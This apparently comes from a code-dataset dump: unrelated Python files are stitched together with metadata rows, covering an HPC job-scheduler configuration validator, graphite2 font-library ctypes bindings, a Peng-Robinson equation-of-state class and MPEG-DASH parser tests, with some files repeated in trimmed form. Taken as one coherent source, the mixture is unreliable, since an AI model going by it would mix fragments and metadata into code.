2. User Configuration: $HOME/.buildtest/config.yml
3. Default Configuration: $BUILDTEST_ROOT/buildtest/settings/config.yml
"""
self._file = (
resolve_path(self._file)
or resolve_path(USER_SETTINGS_FILE)
or DEFAULT_SETTINGS_FILE
)
def name(self):
"""Return name of matched system from configuration file"""
return self._name
def detect_system(self):
"""This method gets current system by setting ``self.target`` by matching ``hostnames`` entry
in each system list with actual system. We retrieve target hostname and determine which system configuration to use.
If no system is found we raise an error.
"""
self.systems = list(self.config["system"].keys())
host_lookup = {}
# get hostname fqdn
cmd = BuildTestCommand("hostname -f")
cmd.execute()
hostname = " ".join(cmd.get_output())
# for every system record we lookup 'hostnames' entry and apply re.match against current hostname. If found we break from loop
for name in self.systems:
host_lookup[name] = self.config["system"][name]["hostnames"]
for host_entry in self.config["system"][name]["hostnames"]:
if re.match(host_entry, hostname):
self.target_config = self.config["system"][name]
self._name = name
break
if not self.target_config:
raise ConfigurationError(
self.config,
self.file,
f"Based on current system hostname: {hostname} we cannot find a matching system {list(self.systems)} based on current hostnames: {host_lookup} ",
)
if self.target_config["executors"].get("local"):
self.localexecutors = list(self.target_config["executors"]["local"].keys())
def validate(self, validate_executors=True):
"""This method validates the site configuration with schema"""
logger.debug(f"Loading default settings schema: {DEFAULT_SETTINGS_SCHEMA}")
config_schema = load_schema(DEFAULT_SETTINGS_SCHEMA)
logger.debug(
f"Validating configuration file with schema: {DEFAULT_SETTINGS_SCHEMA}"
)
custom_validator(recipe=self.config, schema=config_schema)
logger.debug("Validation was successful")
if validate_executors:
self._executor_check()
if (
self.target_config.get("moduletool") != "N/A"
and self.target_config.get("moduletool") != system.system["moduletool"]
):
raise ConfigurationError(
self.config,
self.file,
f"Cannot find modules_tool: {self.target_config['moduletool']} from configuration, please confirm if you have environment-modules or lmod and specify the appropriate tool.",
)
def _executor_check(self):
self._validate_slurm_executors()
self._validate_lsf_executors()
self._validate_cobalt_executors()
self._validate_pbs_executors()
def _validate_lsf_executors(self):
"""This method validates all LSF executors. We check if queue is available
and in ``Open:Active`` state.
"""
lsf_executors = deep_get(self.target_config, "executors", "lsf")
if not lsf_executors:
return
lsf = LSF()
assert hasattr(lsf, "queues")
queue_list = []
valid_queue_state = "Open:Active"
record = lsf.queues["RECORDS"]
# retrieve all queues from json record
for name in record:
queue_list.append(name["QUEUE_NAME"])
# check all executors have defined valid queues and check queue state.
for executor in lsf_executors:
queue = lsf_executors[executor].get("queue")
# if queue field is defined check if its valid queue
if queue:
if queue not in queue_list:
raise ConfigurationError(
self.config,
self.file,
f"{lsf_executors[executor]['queue']} not a valid queue!. Please select one of the following queue: {queue_list}",
)
# check queue record for Status
for name in record:
# skip record until we find matching queue
if name["QUEUE_NAME"] != queue:
continue
queue_state = name["STATUS"]
# if state not Open:Active we raise error
if not queue_state == valid_queue_state:
raise ConfigurationError(
self.config,
self.file,
f"{lsf_executors[executor]['queue']} is in state: {queue_state}. It must be in {valid_queue_state} state in order to accept jobs",
)
self.lsfexecutors.append(executor)
def _validate_slurm_executors(self):
"""This method will validate slurm executors, we check if partition, qos,
and cluster fields are valid values by retrieving details from slurm configuration.
These checks are performed on fields ``partition``, ``qos`` or ``cluster``
if specified in executor section.
"""
slurm_executor = deep_get(self.target_config, "executors", "slurm")
if not slurm_executor:
return
slurm = Slurm()
# make sure slurm attributes slurm.partitions, slurm.qos, slurm.clusters are set
assert hasattr(slurm, "partitions")
assert hasattr(slurm, "qos")
assert hasattr(slurm, "clusters")
for executor in slurm_executor:
# if 'partition' key defined check if its valid partition
if slurm_executor[executor].get("partition"):
if slurm_executor[executor]["partition"] not in slurm.partitions:
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['partition']} not a valid partition!. Please select one of the following partitions: {slurm.partitions}",
)
query = (
f"sinfo -p {slurm_executor[executor]['partition']} -h -O available"
)
cmd = BuildTestCommand(query)
cmd.execute()
part_state = "".join(cmd.get_output())
part_state = part_state.rstrip()
# check if partition is in 'up' state. If not we raise an error.
if part_state != "up":
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['partition']} is in state: {part_state}. It must be in 'up' state in order to accept jobs",
)
# check if 'qos' key is valid qos
if (
slurm_executor[executor].get("qos")
and slurm_executor[executor].get("qos") not in slurm.qos
):
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['qos']} not a valid qos! Please select one of the following qos: {slurm.qos}",
)
# check if 'cluster' key is valid slurm cluster
if (
slurm_executor[executor].get("cluster")
and slurm_executor[executor].get("cluster") not in slurm.clusters
):
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['cluster']} not a valid slurm cluster! Please select one of the following slurm clusters: {slurm.clusters}",
)
self.slurmexecutors.append(executor)
def _validate_cobalt_executors(self):
"""Validate cobalt queue property by running ```qstat -Ql <queue>``. If
its a non-zero exit code then queue doesn't exist otherwise it is a valid
queue.
"""
cobalt_executor = deep_get(self.target_config, "executors", "cobalt")
if not cobalt_executor:
return
cobalt = Cobalt()
assert hasattr(cobalt, "queues")
for executor in cobalt_executor:
queue = cobalt_executor[executor].get("queue")
# if queue property defined in cobalt executor name check if it exists
if queue not in cobalt.queues:
raise ConfigurationError(
self.config,
self.file,
f"Queue: {queue} does not exist! To see available queues you can run 'qstat -Ql'",
)
self.cobaltexecutors.append(executor)
def _validate_pbs_executors(self):
"""Validate pbs queue property by running by checking if queue is found and
queue is 'enabled' and 'started' which are two properties found in pbs queue
configuration that can be retrieved using ``qstat -Q -f -F json``. The output is in
the following format
.. code-block:: console
$ qstat -Q -f -F json
{
"timestamp":1615924938,
"pbs_version":"19.0.0",
"pbs_server":"pbs",
"Queue":{
"workq":{
"queue_type":"Execution",
"total_jobs":0,
"state_count":"Transit:0 Queued:0 Held:0 Waiting:0 Running:0 Exiting:0 Begun:0 ",
"resources_assigned":{
"mem":"0kb",
"ncpus":0,
"nodect":0
},
"hasnodes":"True",
"enabled":"True",
"started":"True"
}
}
}
"""
pbs_executor = deep_get(self.target_config, "executors", "pbs")
if not pbs_executor:
return
pbs = PBS()
assert hasattr(pbs, "queues")
for executor in pbs_executor:
queue = pbs_executor[executor].get("queue")
if queue not in pbs.queues:
raise ConfigurationError(
self.config, self.file, f"{queue} not in {pbs.queues}"
)
if (
pbs.queue_summary["Queue"][queue]["enabled"] != "True"
or pbs.queue_summary["Queue"][queue]["started"] != "True"
):
print("Queue Configuration")
print(json.dumps(pbs.queue_summary, indent=2))
raise ConfigurationError(
self.config,
self.file,
f"{queue} is not enabled or started properly. Please check your queue configuration",
)
self.pbsexecutors.append(executor)
| 751 | 0 | 106 |
756d20aa02f85429376fdfee0f98ca46c91f170f | 11,781 | py | Python | libraries/graphite2-1.3.12/tests/graphite.py | myzhang1029/zmymingw | 4c6b6088fb8a03248a1e6d9d6126dfaf225ffa56 | [
"CC0-1.0"
] | null | null | null | libraries/graphite2-1.3.12/tests/graphite.py | myzhang1029/zmymingw | 4c6b6088fb8a03248a1e6d9d6126dfaf225ffa56 | [
"CC0-1.0"
] | null | null | null | libraries/graphite2-1.3.12/tests/graphite.py | myzhang1029/zmymingw | 4c6b6088fb8a03248a1e6d9d6126dfaf225ffa56 | [
"CC0-1.0"
] | null | null | null | # Copyright 2012, SIL International
# All rights reserved.
#
# This library is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation; either version 2.1 of License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should also have received a copy of the GNU Lesser General Public
# License along with this library in the file named "LICENSE".
# If not, write to the Free Software Foundation, 51 Franklin Street,
# suite 500, Boston, MA 02110-1335, USA or visit their web page on the
# internet at http://www.fsf.org/licenses/lgpl.html.
from __future__ import print_function, unicode_literals, division, absolute_import
try:
unicode
except NameError:
unicode = str
from ctypes import *
import ctypes.util
import sys, os, platform
gr2 = cdll.LoadLibrary(os.environ.get('PYGRAPHITE2_LIBRARY_PATH',
ctypes.util.find_library("graphite2")))
tablefn = CFUNCTYPE(c_void_p, c_void_p, c_uint, POINTER(c_size_t))
advfn = CFUNCTYPE(c_float, c_void_p, c_ushort)
fn('gr_engine_version', None, POINTER(c_int), POINTER(c_int), POINTER(c_int))
fn('gr_make_face', c_void_p, c_void_p, tablefn, c_uint)
fn('gr_str_to_tag', c_uint32, c_char_p)
fn('gr_tag_to_str', None, c_uint32, POINTER(c_char))
fn('gr_face_featureval_for_lang', c_void_p, c_void_p, c_uint32)
fn('gr_face_find_fref', c_void_p, c_void_p, c_uint32)
fn('gr_face_n_fref', c_uint16, c_void_p)
fn('gr_face_fref', c_void_p, c_void_p, c_uint16)
fn('gr_face_n_languages', c_ushort, c_void_p)
fn('gr_face_lang_by_index', c_uint32, c_void_p, c_uint16)
fn('gr_face_destroy', None, c_void_p)
fn('gr_face_n_glyphs', c_ushort, c_void_p)
fn('gr_face_info', POINTER(FaceInfo), c_void_p)
fn('gr_face_is_char_supported', c_int, c_void_p, c_uint32, c_uint32)
fn('gr_make_file_face', c_void_p, c_char_p, c_uint)
fn('gr_make_font', c_void_p, c_float, c_void_p)
fn('gr_make_font_with_advance_fn', c_void_p, c_float, c_void_p, advfn, c_void_p)
fn('gr_font_destroy', None, c_void_p)
fn('gr_fref_feature_value', c_uint16, c_void_p, c_void_p)
fn('gr_fref_set_feature_value', c_int, c_void_p, c_uint16, c_void_p)
fn('gr_fref_id', c_uint32, c_void_p)
fn('gr_fref_n_values', c_uint16, c_void_p)
fn('gr_fref_value', c_int16, c_void_p, c_uint16)
fn('gr_fref_label', c_void_p, c_void_p, POINTER(c_uint16), c_int, POINTER(c_uint32))
fn('gr_fref_value_label', c_void_p, c_void_p, c_uint16, POINTER(c_uint16), c_int, POINTER(c_uint32))
fn('gr_label_destroy', None, c_void_p)
fn('gr_featureval_clone', c_void_p, c_void_p)
fn('gr_featureval_destroy', None, c_void_p)
fn('gr_cinfo_unicode_char', c_uint, c_void_p)
fn('gr_cinfo_break_weight', c_int, c_void_p)
fn('gr_cinfo_after', c_int, c_void_p)
fn('gr_cinfo_before', c_int, c_void_p)
fn('gr_cinfo_base', c_size_t, c_void_p)
fn('gr_count_unicode_characters', c_size_t, c_int, c_void_p, c_void_p, POINTER(c_void_p))
fn('gr_make_seg', c_void_p, c_void_p, c_void_p, c_uint32, c_void_p, c_int, c_void_p, c_size_t, c_int)
fn('gr_seg_destroy', None, c_void_p)
fn('gr_seg_advance_X', c_float, c_void_p)
fn('gr_seg_advance_Y', c_float, c_void_p)
fn('gr_seg_n_cinfo', c_uint, c_void_p)
fn('gr_seg_cinfo', c_void_p, c_void_p, c_uint)
fn('gr_seg_n_slots', c_uint, c_void_p)
fn('gr_seg_first_slot', c_void_p, c_void_p)
fn('gr_seg_last_slot', c_void_p, c_void_p)
fn('gr_seg_justify', c_float, c_void_p, c_void_p, c_void_p, c_double, c_int, c_void_p, c_void_p)
fn('gr_slot_next_in_segment', c_void_p, c_void_p)
fn('gr_slot_prev_in_segment', c_void_p, c_void_p)
fn('gr_slot_attached_to', c_void_p, c_void_p)
fn('gr_slot_first_attachment', c_void_p, c_void_p)
fn('gr_slot_next_sibling_attachment', c_void_p, c_void_p)
fn('gr_slot_gid', c_ushort, c_void_p)
fn('gr_slot_origin_X', c_float, c_void_p)
fn('gr_slot_origin_Y', c_float, c_void_p)
fn('gr_slot_advance_X', c_float, c_void_p)
fn('gr_slot_advance_Y', c_float, c_void_p)
fn('gr_slot_before', c_int, c_void_p)
fn('gr_slot_after', c_int, c_void_p)
fn('gr_slot_index', c_uint, c_void_p)
fn('gr_slot_attr', c_int, c_void_p, c_void_p, c_int, c_uint8)
fn('gr_slot_can_insert_before', c_int, c_void_p)
fn('gr_slot_original', c_int, c_void_p)
fn('gr_slot_linebreak_before', None, c_void_p)
(major, minor, debug) = grversion()
if major > 1 or minor > 1 :
fn('gr_start_logging', c_int, c_void_p, c_char_p)
fn('gr_stop_logging', None, c_void_p)
else :
fn('graphite_start_logging', c_int, c_void_p, c_int)
fn('graphite_stop_logging', None)
| 32.454545 | 163 | 0.678975 | # Copyright 2012, SIL International
# All rights reserved.
#
# This library is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation; either version 2.1 of License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should also have received a copy of the GNU Lesser General Public
# License along with this library in the file named "LICENSE".
# If not, write to the Free Software Foundation, 51 Franklin Street,
# suite 500, Boston, MA 02110-1335, USA or visit their web page on the
# internet at http://www.fsf.org/licenses/lgpl.html.
from __future__ import print_function, unicode_literals, division, absolute_import
try:
unicode
except NameError:
unicode = str
from ctypes import *
import ctypes.util
import sys, os, platform
gr2 = cdll.LoadLibrary(os.environ.get('PYGRAPHITE2_LIBRARY_PATH',
ctypes.util.find_library("graphite2")))
def grversion() :
a = c_int()
b = c_int()
c = c_int()
gr2.gr_engine_version(byref(a), byref(b), byref(c))
return (a.value, b.value, c.value)
def fn(name, res, *params) :
f = getattr(gr2, name)
f.restype = res
f.argtypes = params
class FaceInfo(Structure) :
_fields_ = [("extra_ascent", c_ushort),
("extra_descent", c_ushort),
("upem", c_ushort)]
tablefn = CFUNCTYPE(c_void_p, c_void_p, c_uint, POINTER(c_size_t))
advfn = CFUNCTYPE(c_float, c_void_p, c_ushort)
fn('gr_engine_version', None, POINTER(c_int), POINTER(c_int), POINTER(c_int))
fn('gr_make_face', c_void_p, c_void_p, tablefn, c_uint)
fn('gr_str_to_tag', c_uint32, c_char_p)
fn('gr_tag_to_str', None, c_uint32, POINTER(c_char))
fn('gr_face_featureval_for_lang', c_void_p, c_void_p, c_uint32)
fn('gr_face_find_fref', c_void_p, c_void_p, c_uint32)
fn('gr_face_n_fref', c_uint16, c_void_p)
fn('gr_face_fref', c_void_p, c_void_p, c_uint16)
fn('gr_face_n_languages', c_ushort, c_void_p)
fn('gr_face_lang_by_index', c_uint32, c_void_p, c_uint16)
fn('gr_face_destroy', None, c_void_p)
fn('gr_face_n_glyphs', c_ushort, c_void_p)
fn('gr_face_info', POINTER(FaceInfo), c_void_p)
fn('gr_face_is_char_supported', c_int, c_void_p, c_uint32, c_uint32)
fn('gr_make_file_face', c_void_p, c_char_p, c_uint)
fn('gr_make_font', c_void_p, c_float, c_void_p)
fn('gr_make_font_with_advance_fn', c_void_p, c_float, c_void_p, advfn, c_void_p)
fn('gr_font_destroy', None, c_void_p)
fn('gr_fref_feature_value', c_uint16, c_void_p, c_void_p)
fn('gr_fref_set_feature_value', c_int, c_void_p, c_uint16, c_void_p)
fn('gr_fref_id', c_uint32, c_void_p)
fn('gr_fref_n_values', c_uint16, c_void_p)
fn('gr_fref_value', c_int16, c_void_p, c_uint16)
fn('gr_fref_label', c_void_p, c_void_p, POINTER(c_uint16), c_int, POINTER(c_uint32))
fn('gr_fref_value_label', c_void_p, c_void_p, c_uint16, POINTER(c_uint16), c_int, POINTER(c_uint32))
fn('gr_label_destroy', None, c_void_p)
fn('gr_featureval_clone', c_void_p, c_void_p)
fn('gr_featureval_destroy', None, c_void_p)
fn('gr_cinfo_unicode_char', c_uint, c_void_p)
fn('gr_cinfo_break_weight', c_int, c_void_p)
fn('gr_cinfo_after', c_int, c_void_p)
fn('gr_cinfo_before', c_int, c_void_p)
fn('gr_cinfo_base', c_size_t, c_void_p)
fn('gr_count_unicode_characters', c_size_t, c_int, c_void_p, c_void_p, POINTER(c_void_p))
fn('gr_make_seg', c_void_p, c_void_p, c_void_p, c_uint32, c_void_p, c_int, c_void_p, c_size_t, c_int)
fn('gr_seg_destroy', None, c_void_p)
fn('gr_seg_advance_X', c_float, c_void_p)
fn('gr_seg_advance_Y', c_float, c_void_p)
fn('gr_seg_n_cinfo', c_uint, c_void_p)
fn('gr_seg_cinfo', c_void_p, c_void_p, c_uint)
fn('gr_seg_n_slots', c_uint, c_void_p)
fn('gr_seg_first_slot', c_void_p, c_void_p)
fn('gr_seg_last_slot', c_void_p, c_void_p)
fn('gr_seg_justify', c_float, c_void_p, c_void_p, c_void_p, c_double, c_int, c_void_p, c_void_p)
fn('gr_slot_next_in_segment', c_void_p, c_void_p)
fn('gr_slot_prev_in_segment', c_void_p, c_void_p)
fn('gr_slot_attached_to', c_void_p, c_void_p)
fn('gr_slot_first_attachment', c_void_p, c_void_p)
fn('gr_slot_next_sibling_attachment', c_void_p, c_void_p)
fn('gr_slot_gid', c_ushort, c_void_p)
fn('gr_slot_origin_X', c_float, c_void_p)
fn('gr_slot_origin_Y', c_float, c_void_p)
fn('gr_slot_advance_X', c_float, c_void_p)
fn('gr_slot_advance_Y', c_float, c_void_p)
fn('gr_slot_before', c_int, c_void_p)
fn('gr_slot_after', c_int, c_void_p)
fn('gr_slot_index', c_uint, c_void_p)
fn('gr_slot_attr', c_int, c_void_p, c_void_p, c_int, c_uint8)
fn('gr_slot_can_insert_before', c_int, c_void_p)
fn('gr_slot_original', c_int, c_void_p)
fn('gr_slot_linebreak_before', None, c_void_p)
(major, minor, debug) = grversion()
if major > 1 or minor > 1 :
fn('gr_start_logging', c_int, c_void_p, c_char_p)
fn('gr_stop_logging', None, c_void_p)
else :
fn('graphite_start_logging', c_int, c_void_p, c_int)
fn('graphite_stop_logging', None)
def tag_to_str(num) :
s = create_string_buffer('\000' * 5)
gr2.gr_tag_to_str(num, s)
return str(s.value)
class Label(unicode) :
def __new__(typename, ref, size) :
return super(Label, typename).__new__(typename, string_at(ref, size))
def __init__(self, ref, size) :
self.ref = ref
def __del__(self, __gr2=gr2) :
if self.ref : __gr2.gr_label_destroy(self.ref)
class FeatureVal(object) :
def __init__(self, fval) :
self.fval = fval
def __del__(self, __gr2=gr2) :
__gr2.gr_featureval_destroy(self.fval)
def get(self, fref) :
return gr2.gr_fref_feature_value(fref.fref, self.fval)
def set(self, fref, val) :
if not gr2.gr_fref_set_feature_value(fref.fref, val, self.fval) :
raise Error
class FeatureRef(object) :
def __init__(self, fref, index = 0) :
self.fref = fref
self.index = index
def num(self) :
return gr2.gr_fref_n_values(self.fref)
def val(self, ind) :
return gr2.gr_fref_value(self.fref, ind)
def name(self, langid) :
lngid = c_uint16(langid)
length = c_uint32(0)
res = gr2.gr_fref_label(self.fref, byref(lngid), 1, byref(length))
return Label(res, length.value)
def label(self, ind, langid) :
lngid = c_uint16(langid)
length = c_uint32(0)
res = gr2.gr_fref_value_label(self.fref, ind, byref(lngid), 1, byref(length))
return Label(res, length.value)
def tag(self) :
return tag_to_str(gr2.gr_fref_id(self.fref))
class Face(object) :
def __init__(self, data, options = 0, fn=None) :
data = data.encode('utf8')
if fn :
self.face = gr2.gr_make_face(data, fn, options)
else :
self.face = gr2.gr_make_file_face(data, options)
def __del__(self, __gr2=gr2) :
__gr2.gr_face_destroy(self.face)
def get_upem(self) :
finfo = gr2.gr_face_info(self.face)
return finfo.contents.upem
def num_glyphs(self) :
return gr2.fr_face_n_glyphs(self.face)
def get_featureval(self, lang) :
if isinstance(lang, bytes) :
lang = gr_str_to_tag(lang)
return FeatureVal(gr2.gr_face_featureval_for_lang(self.face, lang))
def get_featureref(self, featid) :
if isinstance(featid, bytes) :
featid = gr_str_to_tag(featid)
return FeatureRef(gr2.gr_face_find_fref(self.face, featid))
@property
def featureRefs(self) :
num = gr2.gr_face_n_fref(self.face)
for i in range(num) :
yield FeatureRef(gr2.gr_face_fref(self.face, i), index = i)
@property
def featureLangs(self) :
num = gr2.gr_face_n_languages(self.face)
for i in range(num) :
yield gr2.gr_face_lang_by_index(self.face, i)
class Font(object) :
def __init__(self, face, ppm, fn=None, data=None) :
if fn :
self.font = gr2.gr_make_font_with_advance_fn(ppm, data, fn, face.face)
else :
self.font = gr2.gr_make_font(ppm, face.face)
def __del__(self, __gr2=gr2) :
__gr2.gr_font_destroy(self.font)
class CInfo(object) :
def __init__(self, pcinfo) :
self.cinfo = pcinfo
@property
def unicode(self) :
return gr2.gr_cinfo_unicode_char(self.cinfo)
@property
def breakweight(self) :
return gr2.gr_cinfo_break_weight(self.cinfo)
@property
def after(self) :
return gr2.gr_cinfo_after(self.cinfo)
@property
def before(self) :
return gr2.gr_cinfo_before(self.cinfo)
@property
def base(self) :
return gr2.gr_cinfo_base(self.cinfo)
class Slot(object) :
def __init__(self, s) :
self.slot = s
def attached_to(self) :
return Slot(gr2.gr_slot_attached_to(self.slot))
def children(self) :
s = gr2.gr_slot_first_attachment(self.slot)
while s :
yield Slot(s)
s = gr2.gr_slot_next_sibling_attachment(s)
@property
def index(self) :
return gr2.gr_slot_index(self.slot)
@property
def gid(self) :
return gr2.gr_slot_gid(self.slot)
@property
def origin(self) :
return (gr2.gr_slot_origin_X(self.slot), gr2.gr_slot_origin_Y(self.slot))
@property
def advance(self) :
return (gr2.gr_slot_advance_X(self.slot), gr2.gr_slot_advance_Y(self.slot))
@property
def before(self) :
return gr2.gr_slot_before(self.slot)
@property
def after(self) :
return gr2.gr_slot_after(self.slot)
@property
def index(self) :
return gr2.gr_slot_index(self.slot)
@property
def insert_before(self) :
return gr2.gr_slot_can_insert_before(self.slot)
@property
def original(self) :
return gr2.gr_slot_original(self.slot)
@property
def linebreak(self) :
gr2.gr_slot_linebreak_before(self.slot)
def gettattr(self, seg, ind, subindex) :
return gr2.gr_slot_attr(self.slot, seg.seg, ind, subindex)
class Segment(object) :
def __init__(self, font, face, scriptid, string, rtl, length = None, feats = None) :
if not length :
length = len(string)
if isinstance(scriptid, bytes) :
scriptid = gr2.gr_str_to_tag(scriptid)
self.seg = gr2.gr_make_seg(font.font if font is not None else 0, face.face, scriptid, (feats.fval if feats else 0), 1, string.encode('utf_8'), length, rtl)
def __del__(self, __gr2=gr2) :
__gr2.gr_seg_destroy(self.seg)
@property
def advance(self) :
return (gr2.gr_seg_advance_X(self.seg), gr2.gr_seg_advance_Y(self.seg))
@property
def num_cinfo(self) :
return gr2.gr_seg_n_cinfo(self.seg)
def cinfo(self, ind) :
return CInfo(gr2.gr_seg_cinfo(self.seg, ind))
@property
def num_slots(self) :
return gr2.gr_seg_n_slots(self.seg)
@property
def slots(self) :
s = gr2.gr_seg_first_slot(self.seg)
res = []
while s :
res.append(Slot(s))
s = gr2.gr_slot_next_in_segment(s)
return res
@property
def revslots(self) :
s = gr2.gr_seg_last_slot(self.seg)
res = []
while s :
res.append(Slot(s))
s = gr2.gr_slot_prev_in_segment(s)
return res
def justify(start, font, width, flags, first = None, last = None) :
gr2.gr_seg_justify(self.seg, start.slot, font.font, width, flags, first.slot if first else 0, last.slot if last else 0)
| 4,853 | 1,444 | 677 |
9de4506c0dcebe59faf722b9fbf0a45256f07f38 | 3,765 | py | Python | pvtpy/eos/peng_robinson.py | scuervo91/pvtpy | 6fe42caee6a193e7a406b3461a397dada3c32445 | [
"MIT"
] | null | null | null | pvtpy/eos/peng_robinson.py | scuervo91/pvtpy | 6fe42caee6a193e7a406b3461a397dada3c32445 | [
"MIT"
] | null | null | null | pvtpy/eos/peng_robinson.py | scuervo91/pvtpy | 6fe42caee6a193e7a406b3461a397dada3c32445 | [
"MIT"
] | null | null | null | from pydantic import BaseModel, Field
import numpy as np
from ..units import Pressure, Temperature, CriticalProperties
| 35.518868 | 128 | 0.588845 | from pydantic import BaseModel, Field
import numpy as np
from ..units import Pressure, Temperature, CriticalProperties
class PengRobinson(BaseModel):
a: float = Field(None)
b: float = Field(None)
alpha: float = Field(None)
a_alpha: float = Field(None)
def coef_ab(self,critical_properties:CriticalProperties, R = 10.73):
pc = critical_properties.critical_pressure.convert_to('psi').value
tc = critical_properties.critical_temperature.convert_to('rankine').value
a = 0.45724 * ((np.square(R) * np.square(tc))/pc)
b = 0.07780 * (R * tc) / pc
self.a = a
self.b = b
return a, b
def coef_m(self, acentric_factor:float):
if acentric_factor > 0.49:
return 0.379642 + 1.48503*acentric_factor - 0.1644*np.power(acentric_factor,2) + 0.01667*np.power(acentric_factor,3)
return 0.3796 + 1.5422*acentric_factor - 0.2699*np.power(acentric_factor,2)
def coef_alpha(self,t:Temperature,critical_properties:CriticalProperties,acentric_factor:float):
tc = critical_properties.critical_temperature.convert_to('rankine').value
t = t.convert_to('rankine').value
#Reduced Temperature
tr = t/tc
#m coef
m = self.coef_m(acentric_factor)
#Alpha coef
alpha = np.square(1 + m*(1-np.sqrt(tr)))
self.alpha = alpha
return alpha
def coef_AB(self, p:Pressure, t:Temperature, R=10.73):
pressure = p.convert_to('psi').value
temperature = t.convert_to('rankine').value
a = self.a
b = self.b
alpha= self.alpha
a_alpha = self.a * self.alpha if self.a_alpha is None else self.a_alpha
A = (a_alpha * pressure) / np.square(R*temperature)
B = (b * pressure) / (R * temperature)
return A, B
def cubic_poly(self,p:Pressure, t:Temperature, R=10.73):
A, B = self.coef_AB(p, t, R=R)
coef = [-(A*B-np.square(B)-np.power(B,3)), A-3*np.square(B)-2*B, B-1,1]
return np.polynomial.Polynomial(coef)
def mixture_coef_ab(self, mole_fraction, a, b, alpha, k=None):
# Redlich-Kwong coefficients from Hydrocarbon mixtures
xx = np.matmul(mole_fraction.reshape(-1,1), mole_fraction.reshape(1,-1))
aa = np.matmul(a.reshape(-1,1), a.reshape(1,-1))
hh = np.matmul(alpha.reshape(-1,1), alpha.reshape(1,-1))
if k is None:
k = 0.
elif k.shape != xx.shape:
raise ValueError(f'k must be a scalar or have the same shape as xx {xx.shape}')
product = xx * np.sqrt(aa * hh)
a_alpha = product.sum().sum()
bm = np.dot(mole_fraction,b)
self.b = bm
self.a_alpha = a_alpha
return a_alpha, bm
def estimate_densities(self, p:Pressure, t:Temperature, molecular_weight:float, R=10.73):
poly = self.cubic_poly(p, t, R=R)
pressure = p.convert_to('psi').value
temperature = t.convert_to('rankine').value
roots = poly.roots()
real_roots = np.isreal(roots)
if real_roots.sum() == 1:
root_z = roots[real_roots].real
rho = (pressure*molecular_weight)/(root_z*R*temperature)
return {'rho':rho}
positive_roots = roots[roots > 0]
gas_root = positive_roots.max()
liquid_root = positive_roots.min()
rho_gas = (pressure*molecular_weight)/(gas_root*R*temperature)
rho_liquid = (pressure*molecular_weight)/(liquid_root*R*temperature)
return {'rho_gas':rho_gas, 'rho_liquid':rho_liquid} | 3,282 | 341 | 23 |
58dd7ca0dc1e5f7d4f6f08f327033b0d25f35645 | 2,139 | py | Python | tests/test_mpdtoxml.py | wreszelewski/python-mpegdash | a0f83810e479711f2f40dd8c44b5a903438a0dcc | [
"MIT"
] | 39 | 2019-10-12T13:41:01.000Z | 2022-03-30T19:58:45.000Z | tests/test_mpdtoxml.py | fox0618/python-mpegdash | 9cdcafd3395d99ad211ea1010eac7aef516ecae4 | [
"MIT"
] | 24 | 2019-09-22T08:56:27.000Z | 2022-03-05T01:21:19.000Z | tests/test_mpdtoxml.py | fox0618/python-mpegdash | 9cdcafd3395d99ad211ea1010eac7aef516ecae4 | [
"MIT"
] | 22 | 2019-10-14T12:24:21.000Z | 2022-03-03T18:50:30.000Z | try:
import unittest
except ImportError:
import unittest2 as unittest
from sys import version_info
from mpegdash.parser import MPEGDASHParser
| 36.254237 | 85 | 0.619916 | try:
import unittest
except ImportError:
import unittest2 as unittest
from sys import version_info
from mpegdash.parser import MPEGDASHParser
class MPD2XMLTestCase(unittest.TestCase):
def test_mpd2xml(self):
mpd = MPEGDASHParser.parse('./tests/mpd-samples/sample-001.mpd')
MPEGDASHParser.write(mpd, './tests/mpd-samples/output.mpd')
mpd2 = MPEGDASHParser.parse('./tests/mpd-samples/output.mpd')
all_reprs = []
for period in mpd.periods:
for adapt_set in period.adaptation_sets:
for repr in adapt_set.representations:
all_reprs.append(repr)
all_reprs2 = []
for period in mpd2.periods:
for adapt_set in period.adaptation_sets:
for repr in adapt_set.representations:
all_reprs2.append(repr)
self.assertTrue(len(all_reprs) == 5)
self.assertTrue(len(all_reprs) == len(all_reprs2))
def test_mpd2xml_boolean_casing(self):
mpd = MPEGDASHParser.parse('./tests/mpd-samples/with_event_message_data.mpd')
MPEGDASHParser.write(mpd, './tests/mpd-samples/output.mpd')
with open('./tests/mpd-samples/output.mpd') as f:
regex = r'segmentAlignment=\"true\"'
# assertRegexpMatches is deprecated in 3, assertRegex not in 2
if version_info > (3, 1,):
self.assertRegex(f.read(), regex)
else:
self.assertRegexpMatches(f.read(), regex)
def test_mpd2xmlstr(self):
# set maxDiff to None for Python2.6
self.maxDiff = None
with open('./tests/mpd-samples/sample-001.mpd') as f:
# read the test MPD
mpd = MPEGDASHParser.parse(f.read())
# get the MPD as an XML string
xmlstrout = MPEGDASHParser.toprettyxml(mpd)
# then parse that string
mpd2 = MPEGDASHParser.parse(xmlstrout)
# get the reparsed MPD as a string
xmlstrout2 = MPEGDASHParser.toprettyxml(mpd2)
# and check the are equal
self.assertEqual(xmlstrout, xmlstrout2)
| 1,864 | 20 | 103 |
0bc05b0077b727e62fea7fe23cb0e20ab099fdea | 9,796 | py | Python | samples/Python/common_samples/common.py | holgafx/gehtsoft | 7bb1dfc23d3b5b45793a85e162bbed2ca963d3ed | [
"Apache-2.0"
] | null | null | null | samples/Python/common_samples/common.py | holgafx/gehtsoft | 7bb1dfc23d3b5b45793a85e162bbed2ca963d3ed | [
"Apache-2.0"
] | null | null | null | samples/Python/common_samples/common.py | holgafx/gehtsoft | 7bb1dfc23d3b5b45793a85e162bbed2ca963d3ed | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Gehtsoft USA LLC
# Licensed under the license derived from the Apache License, Version 2.0 (the "License");
